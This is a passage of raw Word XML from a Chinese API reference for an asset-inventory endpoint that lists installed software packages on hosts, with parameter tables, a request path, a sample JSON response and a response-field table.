        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ED1451E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D558083" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装包名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="41F034EF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4598B9FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F237BB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F4D2744" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE8401C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装类型（仅Linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="32A60899" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="372B8898" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>installTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C240BE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE99135" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7474747E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2A9BE9EA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26A4B51E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>publisher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17C50A15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D20745C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="611CD81E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>软件发布者(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2094D08B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6988E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DB4F587" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="223C3B6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BC06FFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装路径(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="498DD028" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08112EC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>productVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163B55D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D57F323" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3217791B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装版本(仅windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D28B1C8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60777615" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>psize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61F9DE84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Ingeter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49DA5474" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57E6D290" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>psize=1,pkgSize=[0,1MB];psize=2,pkgSize=[1,10MB]; psize=3,pkgSize=[10,100MB]; psize=4,pkgSize=[100,1024MB];psize=5,pkgSize=[1024,MB]; （仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D392CD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0579C5CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/pkg/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA5AB21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2D52D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "im-chooser",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "summary": "Desktop Input Method configuration tool ",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "1.3.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "installTime": "2017-10-31 21:39:39",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": "rpm",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "publisher": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pkgSize": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "path": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "productVersion": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8DE10"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671"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2445"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5D3F4A6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CCBE6ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2566E725" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77BE3022" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5649834F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12747636" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="601585E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34BE5212" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="045F5901" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58E63462" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E0ED6AD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18E7AA98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A884CCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29F74E88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F8C8D21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1ED61EE8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A4E5A5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AED0EAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2358F6D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2702507A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="08B35603" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="176C61CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33F0E62A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BBABA4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05898B58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10E66E27" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62F7568D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45C05888" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F11362A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5257E484" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71B9D75F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="731C8B9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2924B76A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="009D2BF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28AC36AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03EA99DB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01884506" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63CCA974" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D8DC2C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0275FFFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12808F77" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A1D0D39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27912A0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="070703ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="332E4E5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5050E423" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="690C879E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20BBABDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ABD139A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22A5DE61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DB533A6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A4CF5B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="057A857C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485F9507" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15E5031D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="59C2020D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
